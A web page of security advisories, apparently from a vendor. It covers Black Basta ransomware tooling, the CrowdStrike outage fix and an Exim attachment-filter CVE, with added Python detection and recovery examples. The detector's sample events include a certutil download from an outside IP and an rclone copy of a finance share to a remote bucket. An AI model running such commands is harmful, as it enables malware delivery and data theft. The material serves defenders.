Black Basta Ransomware Gang Changes Tactics


Summary

Since the disruption of its partner QBot, the Black Basta ransomware gang has changed tactics: it now deploys new custom malware and a range of tools to evade detection and extend its attack capabilities.


Technical Details

Black Basta is a ransomware operator known for double-extortion campaigns, combining data theft with encryption to demand large ransom payments. After the QBot botnet disruption, the group formed new alliances with those affiliated with DarkGate malware and SilentNight. Mandiant tracks the Black Basta group as UNC4393 and highlights its use of new malware and tools in its operations, indicating that the group continues to evolve and remains a threat.

In late 2023, Black Basta turned to other initial access distribution methods, specifically those related to DarkGate malware. They later shifted to using SilentNight, a versatile backdoor malware delivered through malvertising. This change also marked the group’s move away from phishing as their primary initial access method. Mandiant reports that Black Basta has transitioned from publicly available tools to internally developed custom malware.

Earlier this year, UNC4393 was observed deploying a custom memory-only dropper named DawnCry, initiating a multi-stage infection process that led to the deployment of DaveShell and PortYard tunneler. PortYard, a custom tool, establishes connections to Black Basta’s command and control (C2) infrastructure and proxies traffic.

Tools used by Black Basta include:

  • BASTA: A C++ ransomware that encrypts local files using ChaCha20/XChaCha20 and appends an encrypted key to each file.
  • SYSTEMBC: A C tunneler that acts as a proxy between a C2 server and remote systems, retrieving additional payloads and hiding network traffic.
  • KNOTWRAP: A memory-only dropper in C/C++ that decrypts and executes additional payloads in memory with advanced obfuscation techniques.
  • KNOTROCK: A .NET utility that creates symbolic links on network shares and executes the BASTA ransomware with the link path.
  • DAWNCRY: A memory-only dropper that decrypts an embedded resource into memory using a hard-coded key, containing shellcode and a DAVESHELL loader.
  • PORTYARD: A tunneler that connects to a hard-coded C2 server, establishing TCP connections to relay servers and proxying traffic.
  • COGSCAN: A .NET reconnaissance tool used to gather information on available network hosts.


Additionally, Black Basta continues to use “living off the land” binaries and readily available tools, including the Windows certutil command-line utility to download SilentNight and the Rclone tool to exfiltrate data.
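The two living-off-the-land patterns named above are straightforward to hunt for in process-creation telemetry. The following is an added example (not code from the advisory or from Mandiant) that classifies constructed Sysmon-style events; the field names, the events and the 203.0.113.10 address are assumptions.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 field names).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "User": "CORP\\jdoe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/upd.bin C:\Users\Public\upd.bin"},
    {"Image": r"C:\Windows\System32\certutil.exe", "User": "CORP\\jdoe",
     "CommandLine": r"certutil.exe -hashfile C:\Users\jdoe\report.pdf SHA256"},
    {"Image": r"C:\Tools\rclone.exe", "User": "CORP\\svc-backup",
     "CommandLine": r"rclone.exe copy D:\Shares\Finance remote:bucket --transfers 32"},
    {"Image": r"C:\Program Files\Git\cmd\git.exe", "User": "CORP\\jdoe",
     "CommandLine": "git pull"},
]

URL_RE = re.compile(r"^https?://", re.IGNORECASE)
DRIVE_PATH_RE = re.compile(r"^[a-z]:\\", re.IGNORECASE)
RCLONE_TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}


def classify(event):
    """Return a rule name for the event, or None if it looks benign."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    args = event["CommandLine"].split()[1:]
    lowered = [a.lower() for a in args]
    if image == "certutil.exe":
        # Legitimate certutil use is local (hashing, certificate stores); a URL
        # argument or the -urlcache switch means it is acting as a downloader.
        if "-urlcache" in lowered or any(URL_RE.match(a) for a in lowered):
            return "certutil-download"
    elif image == "rclone.exe":
        # A transfer verb plus a non-local destination (remote:path) indicates
        # data leaving the host; local drive letters and switches are excluded.
        has_verb = any(a in RCLONE_TRANSFER_VERBS for a in lowered)
        has_remote = any(":" in a and not DRIVE_PATH_RE.match(a) and not a.startswith("-")
                         for a in args)
        if has_verb and has_remote:
            return "rclone-exfil"
    return None


def scan(events):
    """Run classify over a batch and collect findings for triage."""
    findings = []
    for ev in events:
        rule = classify(ev)
        if rule:
            findings.append({"rule": rule, "user": ev["User"], "command": ev["CommandLine"]})
    return findings
```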


Indicators of Compromise (IOCs)

Hashes


IP Addresses


Related Domains


Recommendations

  • Implement trusted ad-blocking software to reduce exposure to potentially malicious advertisements.
  • Enforce browser security settings to block pop-ups and restrict JavaScript execution from unknown sources.
  • Keep antivirus and antimalware software up to date to detect and block malicious ads.
  • Implement web filtering solutions to block access to known malicious websites.
  • Educate users about the dangers of malvertising and encourage them to avoid clicking on ads, especially from untrusted sources.
  • Regularly update web browsers and plugins to protect against vulnerabilities that malvertising campaigns may exploit.
  • Deploy EDR solutions to monitor, detect, and respond to suspicious activities on endpoints.
  • Segment the network to limit the spread of malware and protect critical assets.
  • Use tools that perform behavioral analysis to detect anomalies that may indicate the presence of custom malware.
  • Implement application whitelisting to allow only approved software to run on the network.
  • Stay updated with threat intelligence feeds to identify and defend against emerging malware threats.
  • Perform regular backups and ensure they are stored securely to facilitate recovery in case of an attack.
  • Implement MFA to add an extra layer of security, making it more difficult for attackers to gain unauthorized access.
  • Use policies to restrict the execution of scripts (e.g., PowerShell, WScript, CScript) to only trusted administrators.
  • Regularly audit and monitor the use of legitimate tools and binaries to detect unusual activities.
  • Use application control solutions to restrict the use of legitimate tools and binaries that are often exploited by attackers.
  • Apply the principle of least privilege, ensuring users and services have the minimum level of access necessary.
  • Enforce security policies that limit the execution of potentially dangerous tools and binaries.


References


2024 North Texas InfraGard Members Alliance Conference


Blackswan Cybersecurity is proud to sponsor the 2024 InfraGard North Texas Annual Critical Infrastructure Conference at The University of Texas at Dallas on Friday, August 23, 2024.

For over 20 years, members of the leadership team at Blackswan have held various senior positions within InfraGard, including Chapter President, Vice President, Secretary, Treasurer, and Advisory Board Member. If you are planning to attend the conference, please stop by the Blackswan booth to discuss how we can help you mitigate business risk, pick up some free swag, or simply to say ‘hi’.

Register here: https://www.ntinfragard.org/events/north-texas-infragard-members-alliance-conference-2024/



Threat Advisory *CRITICAL* – CrowdStrike Causing Widespread Global Outages


Summary

An update pushed out by CrowdStrike within the past 12 hours has caused widespread outages to Windows environments where CrowdStrike is installed. This was not an elective update and therefore was applied to every endpoint with internet connectivity. The impact of this update caused the infamous Blue Screen of Death (BSOD) and will require manual intervention on every device.


Impact

Millions of endpoints globally were rendered inoperable, affecting organizations ranging from the 3 largest airlines (delaying flights) to hospital networks, government agencies, and news networks. Any endpoint with CrowdStrike installed that had internet connectivity within the past 12 hours is likely affected.

  • Endpoints running older Windows 7 and 2008 R2 were not impacted.
  • Endpoints running Mac or Linux were not impacted.

The channel file “C-00000291*.sys” with a timestamp of 0409 UTC is the problem.


Solution

Windows Endpoint (BitLocker not enabled)

  1. Boot Windows into Safe Mode or the Windows Recovery Environment
  2. Use Windows Explorer or the Command Prompt to navigate to the C:\Windows\System32\drivers\CrowdStrike directory
  3. Locate the file matching “C-00000291*.sys” and delete it.
  4. Boot the host normally.

Windows Endpoint (BitLocker enabled)

  1. Boot Windows into Safe Mode or the Windows Recovery Environment
  2. Navigate to Troubleshoot > Advanced Options > Startup Settings
  3. Press “Restart”
  4. Skip the BitLocker recovery key prompt by pressing “Esc”
  5. Skip the next BitLocker recovery key prompt by selecting “Skip This Device”, in the bottom right
  6. Navigate to Troubleshoot > Advanced Options > Command Prompt
  7. Type “bcdedit /set {default} safeboot minimal”, then press “Enter”
  8. Go back to the WinRE main menu and select “Continue”
  9. The device may cycle 2 to 3 times
  10. If booted into Safe Mode, log in as usual
  11. Use Windows Explorer to navigate to the C:\Windows\System32\drivers\CrowdStrike directory
  12. Locate the file matching “C-00000291*.sys” and delete it.
  13. Open Command Prompt as Administrator
  14. Type “bcdedit /deletevalue {default} safeboot”, then press “Enter”
  15. Restart as normal

Cloud Environment

Option 1

  1. Detach the operating system disk volume from the impacted virtual server
  2. Create a snapshot or backup of the disk volume before proceeding further as a precaution against unintended changes
  3. Attach/mount the volume to a new virtual server
  4. Navigate to the %WINDIR%\System32\drivers\CrowdStrike directory
  5. Locate the file matching “C-00000291*.sys”, and delete it.
  6. Detach the volume from the new virtual server
  7. Reattach the fixed volume to the impacted virtual server
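For the mounted-volume procedure above (steps 4 and 5), the following is an added example, not code from the advisory or from CrowdStrike, that finds the channel file by both its name pattern and its 0409 UTC timestamp and quarantines it rather than deleting it outright. It assumes the volume is mounted at the path passed as volume_root and that the calendar date is 19 July 2024; the sample volume it builds is constructed.

```python
import fnmatch
import os
import shutil
import tempfile
from datetime import datetime, timezone
from pathlib import Path

# Pattern and time of day are from the advisory; the 19 July 2024 date is an assumption.
BAD_PATTERN = "C-00000291*.sys"
BAD_TIMESTAMP_UTC = "2024-07-19 04:09"
DRIVER_SUBDIR = Path("Windows") / "System32" / "drivers" / "CrowdStrike"


def is_bad_channel_file(path):
    """Match both the name pattern and the 0409 UTC modification time."""
    if not fnmatch.fnmatch(path.name, BAD_PATTERN):
        return False
    mtime = datetime.fromtimestamp(path.stat().st_mtime, tz=timezone.utc)
    return mtime.strftime("%Y-%m-%d %H:%M") == BAD_TIMESTAMP_UTC


def find_bad_channel_files(volume_root):
    """Dry run over the driver directory of a volume mounted at volume_root (step 4)."""
    directory = Path(volume_root) / DRIVER_SUBDIR
    if not directory.is_dir():
        return []
    return sorted(p for p in directory.iterdir() if p.is_file() and is_bad_channel_file(p))


def quarantine_bad_channel_files(volume_root, quarantine_dir):
    """Step 5, but moving matches into quarantine_dir so the change is reversible."""
    quarantine = Path(quarantine_dir)
    quarantine.mkdir(parents=True, exist_ok=True)
    moved = []
    for path in find_bad_channel_files(volume_root):
        target = quarantine / path.name
        shutil.move(str(path), str(target))
        moved.append(target)
    return moved


def make_sample_volume():
    """Constructed stand-in for a mounted volume: one file carrying the bad
    timestamp and one older sibling. Returns (root, bad_file, older_file)."""
    root = tempfile.mkdtemp()
    directory = Path(root) / DRIVER_SUBDIR
    directory.mkdir(parents=True)
    bad = directory / "C-00000291-00000000-00000032.sys"
    older = directory / "C-00000291-00000000-00000031.sys"
    for path, when in ((bad, datetime(2024, 7, 19, 4, 9, 30, tzinfo=timezone.utc)),
                       (older, datetime(2024, 7, 18, 4, 9, 0, tzinfo=timezone.utc))):
        path.write_bytes(b"\x00" * 16)
        os.utime(path, (when.timestamp(), when.timestamp()))
    return root, bad, older
```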


Option 2

  1. Roll back to a snapshot prior to 0409 UTC


References

  1. https://mashable.com/article/crowdstrike-crash-microsoft-outage-bsod-fix
  2. https://www.wired.com/story/microsoft-windows-outage-crowdstrike-global-it-probems/
  3. https://www.crowdstrike.com/blog/statement-on-windows-sensor-update/


Exim Mail Server Flaw


Summary

A critical security vulnerability has been identified in the Exim mail transfer agent, potentially allowing attackers to send malicious attachments to users’ inboxes. This flaw (CVE-2024-39929) has a CVSS score of 9.1. The issue was resolved in version 4.98.


Technical Details

The vulnerability stems from an improper parsing of multiline RFC2231 header filenames, enabling remote attackers to deliver malicious executable attachments to end users’ mailboxes by bypassing the $mime_filename extension-blocking protection mechanism. Exim, a free mail transfer agent used on Unix and Unix-like operating systems, was first released in 1995 at the University of Cambridge.
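An added example, not Exim's code or the advisory's, showing why an extension check has to run on the fully reassembled RFC 2231 filename: a filter that only looks for a plain filename= parameter sees nothing on the continued (filename*0=, filename*1=) form, while an RFC 2231-aware parse recovers quarterly-report.exe and blocks it. The messages are constructed and the blocked-extension set is an assumption.

```python
import email
import os
import re
from email import policy
from email.utils import collapse_rfc2231_value

BLOCKED_EXTENSIONS = {".exe", ".scr", ".bat", ".cmd", ".js", ".vbs"}

# Constructed sample: the attachment name is split over two RFC 2231
# sections, so no plain filename= parameter appears in the header.
SAMPLE_CONTINUED = b"""\
From: sender@example.test
To: user@example.test
Subject: constructed sample
MIME-Version: 1.0
Content-Type: application/octet-stream
Content-Disposition: attachment;
 filename*0="quarterly-report";
 filename*1=".exe"

MZ...
"""

# Constructed benign sample with a conventional single filename parameter.
SAMPLE_PLAIN = SAMPLE_CONTINUED.replace(
    b' filename*0="quarterly-report";\n filename*1=".exe"',
    b' filename="notes.txt"')

def naive_filename(raw_message):
    """What a filter sees if it only looks for a plain filename= parameter:
    the continued form yields None, so nothing gets blocked."""
    msg = email.message_from_bytes(raw_message, policy=policy.compat32)
    disposition = msg.get("Content-Disposition", "")
    match = re.search(r'(?i)\bfilename="?([^";]+)"?', disposition)
    return match.group(1) if match else None

def decoded_filename(raw_message):
    """Concatenate the numbered sections (and charset-decode if encoded)
    so the check runs on the name the recipient's client will display."""
    msg = email.message_from_bytes(raw_message, policy=policy.compat32)
    value = msg.get_param("filename", header="content-disposition")
    return None if value is None else collapse_rfc2231_value(value)

def is_blocked(raw_message):
    """True when the reassembled attachment name carries a blocked extension."""
    name = decoded_filename(raw_message)
    if name is None:
        return False
    return os.path.splitext(name.lower())[1] in BLOCKED_EXTENSIONS
```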

According to Censys, there are approximately 4,830,719 public-facing SMTP mail servers running Exim. As of July 12, 2024, 1,563,085 of these Exim servers are running vulnerable versions (4.97.1 or earlier). Most of these vulnerable instances are in the U.S., Russia, and Canada. Censys stated, “The vulnerability could allow a remote attacker to bypass filename extension blocking protection measures and deliver executable attachments directly to end-users’ mailboxes. If a user were to download or run one of these malicious files, the system could be compromised.”

For the attack to succeed, targets must click on an attached executable file. Although there are no reports of active exploitation, users must promptly apply patches to mitigate potential threats. This development comes almost a year after the maintainers of Exim addressed a set of six vulnerabilities that could lead to information disclosure and remote code execution.


Recommendations

  • Immediately upgrade to Exim version 4.98 or later to address the vulnerability (CVE-2024-39929).
  • Identify and audit all Exim servers within your network to determine which ones are running vulnerable versions (4.97.1 or earlier).
  • Apply the latest security patches to all identified Exim servers to mitigate the vulnerability.
  • Enable detailed logging and monitoring on Exim servers to detect any unusual activity that may indicate exploitation attempts.
  • Educate users about the risks of downloading and executing attachments from unknown or untrusted sources, emphasizing the importance of cautious behavior.
  • Ensure that email security policies, such as attachment filtering and extension blocking, are properly configured and enforced to prevent similar vulnerabilities from being exploited in the future.


References